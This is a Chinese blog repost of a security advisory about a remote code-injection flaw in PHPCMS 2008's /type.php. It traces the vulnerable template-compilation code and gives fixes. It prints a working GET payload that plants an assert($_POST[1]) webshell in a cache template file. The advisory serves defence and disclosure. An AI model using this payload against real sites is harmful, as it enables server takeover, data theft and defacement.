博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
CVE漏洞—PHPCMS2008 /type.php代码注入高危漏洞预警
阅读量:6228 次
发布时间:2019-06-21

本文共 2067 字,大约阅读时间需要 6 分钟。

hot3.png

摘要:11月4日,阿里云安全首次捕获PHPCMS 2008版本的/type.php远程GetShell 0day利用攻击,攻击者可以利用该漏洞远程植入webshell,导致文件篡改、数据泄漏、服务器被远程控制等一系列严重问题。建议受影响用户尽快升级到最新版本修复。

———————

PHPCMS网站内容管理系统是国内主流CMS系统之一,同时也是一个开源的PHP开发框架。

PHPCMS最早于2008年推出,最新版已出到v9.6.3,但由于稳定、灵活、开源的特性,时至今日,PHPCMS2008版本仍被许多网站所使用。

漏洞细节

当攻击者向安装有PHPCMS 2008的网站发送uri为如下文本的payload

/type.php?template=tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

那么@unlink(_FILE_);assert($_POST[1]);这句恶意php指令将被写入网站的/cache_template/rss.tpl.php文件。

漏洞原理

该漏洞源于PHPCMS 2008源码中的/type.php文件。该文件包含如下代码:

if(empty($template)) $template = 'type';...include template('phpcms', $template);

这里template变量是用户能够通过传入参数控制的,同时可以看到该变量之后会被传入template()方法。而template()方法在/include/global.func.php文件中定义,包含如下代码:

template_compile($module, $template, $istag);

不难看出,这里会继续调用/include/template.func.php中的template_compile():

function template_compile($module, $template, $istag = 0){    ...    $compiledtplfile = TPL_CACHEPATH.$module.'_'.$template.'.tpl.php';    $content = ($istag || substr($template, 0, 4) == 'tag_') ? '
'.template_parse($content, 1).'
' : template_parse($content); $strlen = file_put_contents($compiledtplfile, $content); ...}

在这个方法中,template变量同时被用于compiledtplfile变量中文件路径的生成,和content变量中文件内容的生成。

而前文所述的攻击payload将template变量被设置为如下的值

tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss

所以在template_compile()方法中,调用file_put_contents()函数时的第一个参数就被写成了data/cache_template/phpcms_tag_(){};@unlink(_FILE_);assert($_POST[1]);{//../rss.tpl.php,这将被php解析成data/cache_template/rss.tpl.php

最终,@unlink(_FILE_);assert($_POST[1]);将被写入该文件。

影响范围

虽然距离PHPCMS2008版本的推出已经10年,但仍有不少网站正在使用PHPCMS2008,包括政府、企业的网站;根据Fofa网络空间安全搜索引擎的全网精确搜索结果显示,还有近200个使用PHPCMS2008版本的网站;而如果使用模糊匹配对网站进行识别,匹配结果更达上万个。

通过利用该漏洞,攻击者在向路径可控的文件写入恶意脚本代码后,后续将能够向该文件发送webshell指令,在服务器上执行任意代码,因此该代码注入漏洞的影响较大。

安全建议

手动修复

临时解决可以在/type.php文件中对template变量进行过滤,避免用户输入的含有"("、"{"等符号的内容混入,并被当做路径和脚本内容处理。

但由于PHPCMS2008版本过旧,用户应尽量升级到最新版本的PHPCMS,才能够更好地保障安全。

安全加固

•云防火墙已支持对该类漏洞的入侵防御,开启云防火墙IPS拦截模式和虚拟补丁功能,用户即使不自行进行修复,也依然能够进行防御和拦截。
•购买安全管家服务,您将能够在阿里云安全专家指导下进行安全加固及优化,避免系统受到该漏洞及后续其他漏洞影响。

转载于:https://my.oschina.net/u/1464083/blog/2981063

你可能感兴趣的文章
Windows 设置时间同步
查看>>
VS2010 调试C++项目 fatal error LNK1123 错误解决办法
查看>>
EBS OAF 开发中的OAMessageRadioGroup控件
查看>>
调整linux的时钟
查看>>
ObjectOutputStream和ObjectInputStream
查看>>
博客增加二维码功能
查看>>
static作用
查看>>
TCP协议中的三次握手和四次挥手(图解)
查看>>
RDIFramework.NET V2.9版本 WinFom部分新增与修正的功能
查看>>
使用Xcode和Instruments调试解决iOS内存泄漏
查看>>
[翻译] MotionBlur
查看>>
在这些形式的验证码
查看>>
Android学习笔记(四十):Preference使用
查看>>
Codeforces Beta Round #6 (Div. 2 Only) E. Exposition multiset
查看>>
ThinkPhp学习09
查看>>
家庭常用5号/7号电池购买及使用攻略
查看>>
IT架构之IT架构标准——思维导图
查看>>
ZOJ3827 ACM-ICPC 2014 亚洲区域赛的比赛现场牡丹江I称号 Information Entropy 水的问题...
查看>>
List、Map和Set实现类
查看>>
Android Fragment 真正彻底的解决(下一个)
查看>>